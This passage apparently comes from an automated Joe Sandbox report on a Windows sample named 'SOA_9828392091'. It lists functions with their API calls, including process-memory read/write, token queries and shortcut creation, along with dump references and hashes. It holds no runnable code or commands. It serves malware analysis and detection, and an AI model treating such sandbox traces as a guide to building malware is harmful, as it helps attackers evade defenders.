                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Window$ForegroundPixelRelease
                                      • String ID:
                                      • API String ID: 4156661090-0
                                      • Opcode ID: 3ef2d510fbd32721ff910ecfa0d5ce12cb7dec344d952f4da0e0dd525dc1e6c3
                                      • Instruction ID: cda68384e60325af3087f1c5085667a084638e081e887fb74f3e32681ce00739
                                      • Opcode Fuzzy Hash: 3ef2d510fbd32721ff910ecfa0d5ce12cb7dec344d952f4da0e0dd525dc1e6c3
                                      • Instruction Fuzzy Hash: EC218176A01204AFD710EFA4D989BAEBBE5EF88311F048479F85997351DB70AD00DB60
                                      Function 0094AF83 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                      Download Yara Rule
                                      APIs
                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0094AFE3
                                      • SelectObject.GDI32(?,00000000), ref: 0094AFF2
                                      • BeginPath.GDI32(?), ref: 0094B009
                                      • SelectObject.GDI32(?,00000000), ref: 0094B033
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ObjectSelect$BeginCreatePath
                                      • String ID:
                                      • API String ID: 3225163088-0
                                      • Opcode ID: a318d01fbfeb5214aabde9a0cf833789c6f75535f79ae058ceb4664f8cbafc9b
                                      • Instruction ID: d0ba9dcf28ca801b3baee80bfffeba2a4b438c7138a846b54ce15d066048fbf2
                                      • Opcode Fuzzy Hash: a318d01fbfeb5214aabde9a0cf833789c6f75535f79ae058ceb4664f8cbafc9b
                                      • Instruction Fuzzy Hash: 9C2183B0829305EFDB10DF55EC44BAA7B6CB711366F14431AE421E21A0D3718845EFD1
                                      Function 0095217F Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • __calloc_crt.LIBCMT ref: 009521A9
                                      • CreateThread.KERNEL32(?,?,009522DF,00000000,?,?), ref: 009521ED
                                      • GetLastError.KERNEL32 ref: 009521F7
                                      • _free.LIBCMT ref: 00952200
                                      • __dosmaperr.LIBCMT ref: 0095220B
                                        • Part of subcall function 00957C0E: __getptd_noexit.LIBCMT ref: 00957C0E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                      • String ID:
                                      • API String ID: 2664167353-0
                                      • Opcode ID: aef0da00d5ea6d3227416b430961f62febbbcf803224d303e5530db05043a54c
                                      • Instruction ID: bbd24e0143815f77e8ec2579e0561f8052b28c569951c09e88db56559628e736
                                      • Opcode Fuzzy Hash: aef0da00d5ea6d3227416b430961f62febbbcf803224d303e5530db05043a54c
                                      • Instruction Fuzzy Hash: 3F1108361097466F9B15EFA7EC42E6B7798EF82771F100529FD2486141EB31D81987A0
                                      Function 0096ABBB Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0096ABD7
                                      • GetLastError.KERNEL32(?,0096A69F,?,?,?), ref: 0096ABE1
                                      • GetProcessHeap.KERNEL32(00000008,?,?,0096A69F,?,?,?), ref: 0096ABF0
                                      • RtlAllocateHeap.NTDLL(00000000,?,0096A69F), ref: 0096ABF7
                                      • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0096AC0E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                                      • String ID:
                                      • API String ID: 883493501-0
                                      • Opcode ID: df39be9d3d2bde073fa1603c61da3c6b51ae9066ec0327e14d88a540f682ee32
                                      • Instruction ID: e3fc627ffb31e5d9da2b8395b3af49f6a05489c46a85cc75dd2e6e8fb7ef9cd1
                                      • Opcode Fuzzy Hash: df39be9d3d2bde073fa1603c61da3c6b51ae9066ec0327e14d88a540f682ee32
                                      • Instruction Fuzzy Hash: B601AF70215204BFDB144FA9DD48DAB3BACFF8A3647100529F845D3260EA75CC40DF60
                                      Function 00969ABF Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CLSIDFromProgID.COMBASE ref: 00969ADC
                                      • ProgIDFromCLSID.COMBASE(?,00000000), ref: 00969AF7
                                      • lstrcmpiW.KERNEL32(?,00000000), ref: 00969B05
                                      • CoTaskMemFree.COMBASE(00000000), ref: 00969B15
                                      • CLSIDFromString.COMBASE(?,?), ref: 00969B21
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                      • String ID:
                                      • API String ID: 3897988419-0
                                      • Opcode ID: 321399adb41e4f0faf55e3a508ae931beb9e9ed9aadeecc326c5ff20255c0f14
                                      • Instruction ID: abda3803be73ed4fd743aca2a525e21d0d5730b6ec57d7b72379444cb3d7c987
                                      • Opcode Fuzzy Hash: 321399adb41e4f0faf55e3a508ae931beb9e9ed9aadeecc326c5ff20255c0f14
                                      • Instruction Fuzzy Hash: 7A01D176611209BFDB104F68EE44BAABBFDEF483A2F148024FD05D2210E770DD00ABA0
                                      Function 00977A58 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00977A74
                                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00977A82
                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00977A8A
                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00977A94
                                      • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00977AD0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                      • String ID:
                                      • API String ID: 2833360925-0
                                      • Opcode ID: cd60518e1467b2f0c32d72eab8e3918e54d9c4176939946f716b22ccbb734dfe
                                      • Instruction ID: be12b8bc6b910d2249ff8568b56ad7de07f852f4752d170450dfcd3fba814ffc
                                      • Opcode Fuzzy Hash: cd60518e1467b2f0c32d72eab8e3918e54d9c4176939946f716b22ccbb734dfe
                                      • Instruction Fuzzy Hash: B2016976C0961DEBEF08AFE8DD48ADDFB78FB08311F004555E402B2150EB3096509BA1
                                      Function 0096AAC3 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0096AADA
                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0096AAE4
                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0096AAF3
                                      • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 0096AAFA
                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0096AB10
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: HeapInformationToken$AllocateErrorLastProcess
                                      • String ID:
                                      • API String ID: 47921759-0
                                      • Opcode ID: 414d4f4ada7ebf97a484410e4918168d1d663fbbfa3fb596da0f9e5bc55475ae
                                      • Instruction ID: 3c6cd85eb8b7d9f99d50c05d407767e8aab71776cabf54c5ed1243bfd6bd193a
                                      • Opcode Fuzzy Hash: 414d4f4ada7ebf97a484410e4918168d1d663fbbfa3fb596da0f9e5bc55475ae
                                      • Instruction Fuzzy Hash: 6FF062712152096FEB111FB4EC88E673BADFF45764F000129F941D7190DA609C01DF61
                                      Function 0096AA62 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0096AA79
                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0096AA83
                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0096AA92
                                      • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 0096AA99
                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0096AAAF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: HeapInformationToken$AllocateErrorLastProcess
                                      • String ID:
                                      • API String ID: 47921759-0
                                      • Opcode ID: 757bdd8efa5ffde30c78bb988004869a21b7063f3ccd4a727235fc7814c353c1
                                      • Instruction ID: 85cd68409cb48dc9d6b0a612c9230af8761767e6ac889ae04e3897d53fd6df3f
                                      • Opcode Fuzzy Hash: 757bdd8efa5ffde30c78bb988004869a21b7063f3ccd4a727235fc7814c353c1
                                      • Instruction Fuzzy Hash: 84F0AF312152046FEB101FA4AD89E673BADFF49764F00012AF901D7190EA609C01DA61
                                      Function 0096EC80 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDlgItem.USER32(?,000003E9), ref: 0096EC94
                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 0096ECAB
                                      • MessageBeep.USER32(00000000), ref: 0096ECC3
                                      • KillTimer.USER32(?,0000040A), ref: 0096ECDF
                                      • EndDialog.USER32(?,00000001), ref: 0096ECF9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                      • String ID:
                                      • API String ID: 3741023627-0
                                      • Opcode ID: c2b4fcb79089b66121b2cebfc9264ace2ef4dde9b0f57b92071712e0270c817a
                                      • Instruction ID: eb4e3411f13dd5d266757b3d06f9ab2067492d21c1b29caa1e883f4f65c4303d
                                      • Opcode Fuzzy Hash: c2b4fcb79089b66121b2cebfc9264ace2ef4dde9b0f57b92071712e0270c817a
                                      • Instruction Fuzzy Hash: 54018134514705ABEB345B10DF9EB967BB8FF00B15F000669B582A14E0EBF8AA44DB80
                                      Function 0094B0AB Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                      Download Yara Rule
                                      APIs
                                      • EndPath.GDI32(?), ref: 0094B0BA
                                      • StrokeAndFillPath.GDI32(?,?,009AE680,00000000,?,?,?), ref: 0094B0D6
                                      • SelectObject.GDI32(?,00000000), ref: 0094B0E9
                                      • DeleteObject.GDI32 ref: 0094B0FC
                                      • StrokePath.GDI32(?), ref: 0094B117
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                      • String ID:
                                      • API String ID: 2625713937-0
                                      • Opcode ID: e3fc6db3d9b615172fa2415c11a5d8ae268bf367daf03e5939ab187f0d7db402
                                      • Instruction ID: d304a0ee0e2ec68ee723127f06ca535c416257de21d17cab7a745d4bf94c9e9f
                                      • Opcode Fuzzy Hash: e3fc6db3d9b615172fa2415c11a5d8ae268bf367daf03e5939ab187f0d7db402
                                      • Instruction Fuzzy Hash: E5F0193002D205EFCB25AF69ED0CB643B68AB14372F088314E425840F0D7318956EF94
                                      Function 0097F23D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CoInitialize.OLE32(00000000), ref: 0097F2DA
                                      • CoCreateInstance.COMBASE(009BDA7C,00000000,00000001,009BD8EC,?), ref: 0097F2F2
                                      • CoUninitialize.COMBASE ref: 0097F555
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: CreateInitializeInstanceUninitialize
                                      • String ID: .lnk
                                      • API String ID: 948891078-24824748
                                      • Opcode ID: b44f15fc05ed43b6fb308fea7c61307f61be0fbf004bb85165f24111a8ec7f18
                                      • Instruction ID: 110f5a52399c01373b842776439a3d9b613d533d073e04efbbbc816e6c415e80
                                      • Opcode Fuzzy Hash: b44f15fc05ed43b6fb308fea7c61307f61be0fbf004bb85165f24111a8ec7f18
                                      • Instruction Fuzzy Hash: 64A129B2104201AFD300EF64C891EABB7E8FFD8714F40495DF59597192EB70EA09CBA2
                                      Function 0097E7DD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0093660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009353B1,?,?,009361FF,?,00000000,00000001,00000000), ref: 0093662F
                                      • CoInitialize.OLE32(00000000), ref: 0097E85D
                                      • CoCreateInstance.COMBASE(009BDA7C,00000000,00000001,009BD8EC,?), ref: 0097E876
                                      • CoUninitialize.COMBASE ref: 0097E893
                                        • Part of subcall function 0093936C: __swprintf.LIBCMT ref: 009393AB
                                        • Part of subcall function 0093936C: __itow.LIBCMT ref: 009393DF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                      • String ID: .lnk
                                      • API String ID: 2126378814-24824748
                                      • Opcode ID: 2ff1e0fa8ab06be57e8fe4e6d68bdf5ce03ce08fed9e3640d74f4f3336cba9bc
                                      • Instruction ID: a4ad4b506fce2c3f9a27f143144e662bddcad66091a5fb7bdef60a323443c305
                                      • Opcode Fuzzy Hash: 2ff1e0fa8ab06be57e8fe4e6d68bdf5ce03ce08fed9e3640d74f4f3336cba9bc
                                      • Instruction Fuzzy Hash: F3A146766043019FCB14DF14C484E5ABBE9BF88724F148998F99A9B3A1CB31ED45CF91
                                      Function 0095325D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                      Download Yara Rule
                                      APIs
                                      • __startOneArgErrorHandling.LIBCMT ref: 009532ED
                                        • Part of subcall function 0095E0D0: __87except.LIBCMT ref: 0095E10B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ErrorHandling__87except__start
                                      • String ID: pow
                                      • API String ID: 2905807303-2276729525
                                      • Opcode ID: e3ea50bfa8adbf091da511777a6a29bb8091cc75a81c6c13b27ad96d876fbbbb
                                      • Instruction ID: 96ed372f2c09592adda4a1ff227f05ff9be8d23b86a7cad967835aaba63c935f
                                      • Opcode Fuzzy Hash: e3ea50bfa8adbf091da511777a6a29bb8091cc75a81c6c13b27ad96d876fbbbb
                                      • Instruction Fuzzy Hash: C3515C31A0C60196CB19E716C94137A2B9C9B80793F60CD68FCE5851E9DE3A8F8CA745
                                      Function 00974606 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                                      Download Yara Rule
                                      APIs
                                      • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,009CDC50,?,0000000F,0000000C,00000016,009CDC50,?), ref: 00974645
                                        • Part of subcall function 0093936C: __swprintf.LIBCMT ref: 009393AB
                                        • Part of subcall function 0093936C: __itow.LIBCMT ref: 009393DF
                                      • CharUpperBuffW.USER32(?,?,00000000,?), ref: 009746C5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: BuffCharUpper$__itow__swprintf
                                      • String ID: REMOVE$THIS
                                      • API String ID: 3797816924-776492005
                                      • Opcode ID: ad350b004e5e18dd306e06034040949c199fef3b680f77ad5f97691387da9113
                                      • Instruction ID: 66d552fb87d00d45ea820924544e8019e38a050e17e1bd082e783c9de74d97c6
                                      • Opcode Fuzzy Hash: ad350b004e5e18dd306e06034040949c199fef3b680f77ad5f97691387da9113
                                      • Instruction Fuzzy Hash: FA417176A002199FCF05DF64C881AADB7B5FF89304F14C469E91AAB2A2DB34DD45CF50
                                      Function 0096C189 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0097430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0096BC08,?,?,00000034,00000800,?,00000034), ref: 00974335
                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0096C1D3
                                        • Part of subcall function 009742D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0096BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00974300
